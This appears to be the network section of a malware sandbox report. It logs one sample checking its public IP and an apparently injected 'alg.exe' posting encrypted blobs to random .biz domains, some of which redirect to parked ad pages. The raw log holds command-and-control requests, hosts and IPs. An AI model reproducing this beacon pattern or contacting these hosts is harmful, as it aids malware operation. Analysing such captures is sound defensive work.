                                                                                                                                                                                                                                    2192.168.2.449741132.226.8.169802124C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:07.713083029 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:19.279946089 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:19 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:19.288301945 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:20.751298904 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:20 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.44974218.141.10.107807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.113981009 CET350OUTPOST /mmfoish HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:08.114059925 CET778OUTData Raw: 80 a3 61 22 a0 d6 55 e7 fe 02 00 00 1c 5a 91 c7 68 50 b7 f9 3e 78 6b 4b 96 0e d1 f3 e1 34 ec bd 6b 3a 3c 37 af c2 e1 e4 2b 28 87 a4 8f 93 a9 d8 e1 00 ed ec ab 2e 24 30 5e 4b 90 f2 70 d3 af 13 d4 49 6a 71 05 f2 f3 11 fc 9c 4a d4 bb 8d 81 9f 3e 82
                                                                                                                                                                                                                                    Data Ascii: a"UZhP>xkK4k:<7+(.$0^KpIjqJ>X*F&\G9meO!+s7o[hE !^hDMTr4[we%Ey2<Ax`Ju+O19PJZ@Q26{tx
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.464982033 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=c3ed7e6ff124a21e28555962855e08a1|8.46.123.189|1735632309|1735632309|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.44974454.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.960571051 CET348OUTPOST /oxojrkg HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:09.960571051 CET778OUTData Raw: 84 0a 58 3b e1 f2 e1 1d fe 02 00 00 d7 e3 64 14 f0 48 b6 3e 36 c2 9c 38 08 25 04 a7 2a ec 39 0f db 0c 90 dd bb 3a 44 70 b5 e1 73 81 f0 1c 84 ac 2f 10 12 95 3d 1a 4a 01 ae 4e c8 88 95 1c f4 3e c9 b1 59 65 98 e2 5a 48 46 52 72 48 b1 37 3b 13 cc 64
                                                                                                                                                                                                                                    Data Ascii: X;dH>68%*9:Dps/=JN>YeZHFRrH7;dP?pOCL>R~Q~6Ao,m,1*1$!CG8fo]7nUJ)XA'Y6rRhIzcEe[8`%=kk?e[^fR}>6$R@,h
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.745225906 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:10 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=bd13f9f4b860d1fddd320b15e2f80ccd|8.46.123.189|1735632310|1735632310|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.44974544.221.84.105807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.862463951 CET352OUTPOST /bufnddtl HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:10.862483025 CET778OUTData Raw: 5c a2 1e 76 f6 0b 7e c0 fe 02 00 00 5c 1f d2 b9 c5 13 1a 65 7c de 55 bf 28 21 29 e8 f0 75 0d 9d 43 c4 5c 4f df 54 8e b0 d0 e3 41 d3 95 78 d7 2c 4a f2 27 c5 32 07 2c 3e 02 d4 dd 5b 2b df 68 7a d0 9c 7c 05 9e ea dd 67 fb 6d 83 10 24 9c 94 9d 13 7b
                                                                                                                                                                                                                                    Data Ascii: \v~\e|U(!)uC\OTAx,J'2,>[+hz|gm${*nU%U}zf&ZB!Bcjk\6lwPIy5zF"g5F?z8|]]YTBHAOx3>~Ti-<2[6ANr.1egH"#_)}jDiB"oW;%#
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.315371037 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=5b29dd654a61560130d16804a070da1f|8.46.123.189|1735632311|1735632311|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.44974672.52.178.23807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.437917948 CET353OUTPOST /xpqdcslnor HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.438761950 CET778OUTData Raw: 9f 5f 69 de 74 c0 e5 c7 fe 02 00 00 cf 64 4e 3e ac 01 54 f7 3c e7 ca 22 e5 15 0a c8 0e b6 3d d2 84 35 b3 61 24 70 e0 5c d6 2e c7 91 be e4 f2 a0 be a2 c5 86 c2 f3 ee e8 d6 19 3f 9f 4d 48 d5 c8 69 a9 73 d7 5c 4a 54 71 5c 7f 64 60 c2 17 c4 ec b2 cf
                                                                                                                                                                                                                                    Data Ascii: _itdN>T<"=5a$p\.?MHis\JTq\d`(c%6bIf)_/w@.XUKs0R6uN;}kuaNw"f_i04EG{,yISZv%=u8g@LUui:
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:11.945173025 CET284INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Location: http://ww7.przvgke.biz/xpqdcslnor?usid=27&utid=10221865676
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.935214996 CET346OUTPOST /ewl HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.935214996 CET778OUTData Raw: 72 48 e4 a3 e1 2a f1 a7 fe 02 00 00 e6 02 8d 81 c7 13 69 ad 95 75 fc b9 fe 10 e5 d5 75 ad 8b 17 6c 17 56 3c 15 cc 20 fe d7 b9 f5 2e a7 fc 1f 0e aa 4f a0 f1 7e 7b 73 90 ff 00 c3 6f 73 14 3f b7 73 48 8c 98 1e 78 d2 15 28 a6 c2 a2 1c 2d 4a 9a a2 43
                                                                                                                                                                                                                                    Data Ascii: rH*iuulV< .O~{sos?sHx(-JCvUsUT.0j-,Mi2Q$TOJOP(]I7g(x<mKK:K#!OgD]6j:aU5M~=:r|4V?<WJ8
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.078196049 CET278INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Location: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.449747199.59.243.227807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.410016060 CET360OUTGET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Host: ww7.przvgke.biz
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.885021925 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    date: Tue, 31 Dec 2024 08:05:12 GMT
                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                    content-length: 1142
                                                                                                                                                                                                                                    x-request-id: 2af85481-75e5-46e5-8346-bf12d36d51a1
                                                                                                                                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tYasp0FAypW1PlS683E3SzZz8Q1pzaCUZXbpWFvp1dPbARSFjAVSYUFAv0nWdn/AUFBcd0QBqIzJyZyLPu1aWg==
                                                                                                                                                                                                                                    set-cookie: parking_session=2af85481-75e5-46e5-8346-bf12d36d51a1; expires=Tue, 31 Dec 2024 08:20:12 GMT; path=/
                                                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 59 61 73 70 30 46 41 79 70 57 31 50 6c 53 36 38 33 45 33 53 7a 5a 7a 38 51 31 70 7a 61 43 55 5a 58 62 70 57 46 76 70 31 64 50 62 41 52 53 46 6a 41 56 53 59 55 46 41 76 30 6e 57 64 6e 2f 41 55 46 42 63 64 30 51 42 71 49 7a 4a 79 5a 79 4c 50 75 31 61 57 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tYasp0FAypW1PlS683E3SzZz8Q1pzaCUZXbpWFvp1dPbARSFjAVSYUFAv0nWdn/AUFBcd0QBqIzJyZyLPu1aWg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:12.885037899 CET576INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                    Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmFmODU0ODEtNzVlNS00NmU1LTgzNDYtYmYxMmQzNmQ1MWExIiwicGFnZV90aW1lIjoxNzM1NjMyMzEyLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.44974813.248.148.254807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.122314930 CET354OUTGET /ewl?usid=27&utid=10221865931 HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Host: ww12.przvgke.biz
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783236027 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Accept-Ch: viewport-width
                                                                                                                                                                                                                                    Accept-Ch: dpr
                                                                                                                                                                                                                                    Accept-Ch: device-memory
                                                                                                                                                                                                                                    Accept-Ch: rtt
                                                                                                                                                                                                                                    Accept-Ch: downlink
                                                                                                                                                                                                                                    Accept-Ch: ect
                                                                                                                                                                                                                                    Accept-Ch: ua
                                                                                                                                                                                                                                    Accept-Ch: ua-full-version
                                                                                                                                                                                                                                    Accept-Ch: ua-platform
                                                                                                                                                                                                                                    Accept-Ch: ua-platform-version
                                                                                                                                                                                                                                    Accept-Ch: ua-arch
                                                                                                                                                                                                                                    Accept-Ch: ua-model
                                                                                                                                                                                                                                    Accept-Ch: ua-mobile
                                                                                                                                                                                                                                    Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:13 GMT
                                                                                                                                                                                                                                    Server: Caddy
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_RtrS/KKFneZo5cv6+d4nRe2w9G3hqDhkP8peaNeNpme9RV4Iyxc9teSaNQJNaGJ606Zu2/Le+X6RszW0L05rXw==
                                                                                                                                                                                                                                    X-Domain: przvgke.biz
                                                                                                                                                                                                                                    X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                                    X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                                    X-Subdomain: ww12
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783318996 CET1236INData Raw: 33 64 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                                                                                    Data Ascii: 3da0<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_RtrS/KKFneZo5cv6+d4nRe2w9G3hqDhkP8peaNeNpme9RV4Iyxc9teSaNQJNaGJ606Zu2
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783350945 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                                                                                    Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783364058 CET448INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783376932 CET1176INData Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 34 38 34 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: color: #848484; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.cloudf
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783432007 CET1236INData Raw: 39 7a 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77
                                                                                                                                                                                                                                    Data Ascii: 9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> <meta name="og:descript
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783477068 CET1236INData Raw: 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 74 6f 6f 6c 62 61 72 3d 6e 6f 27 29 2e 66 6f 63 75 73 28 29 22 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 0a 20 20 20 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 0a 3c 2f
                                                                                                                                                                                                                                    Data Ascii: =no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'con
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783489943 CET1236INData Raw: 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 3d 27 4d 54 63 7a 4e 54 59 7a 4d 6a 4d 78 4d 79 34 32 4d 54 6b 35 4f 6a 55 30 4f 57 52 69 4e 44 67 77 4e 6a 5a 6d 4d 7a 6b 78 4d 47 4e 6d 4e 54 41 33 4d 44
                                                                                                                                                                                                                                    Data Ascii: ; let uniqueTrackingID='MTczNTYzMjMxMy42MTk5OjU0OWRiNDgwNjZmMzkxMGNmNTA3MDBmMGEzMzg0MzFmYjA4NjE0ODExYWNiOTJlNzQ4ZTg0YjZhNWYxMWY5MjQ6Njc3M2E1Yjk5NzU0ZA=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783524036 CET672INData Raw: 27 61 64 74 65 73 74 27 3a 20 74 72 75 65 2c 27 63 6c 69 63 6b 74 72 61 63 6b 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 74 72 61 63 6b 2e 70 68 70 3f 27 2c 27 61 74 74 72 69 62 75 74 69 6f 6e 54
                                                                                                                                                                                                                                    Data Ascii: 'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoaded
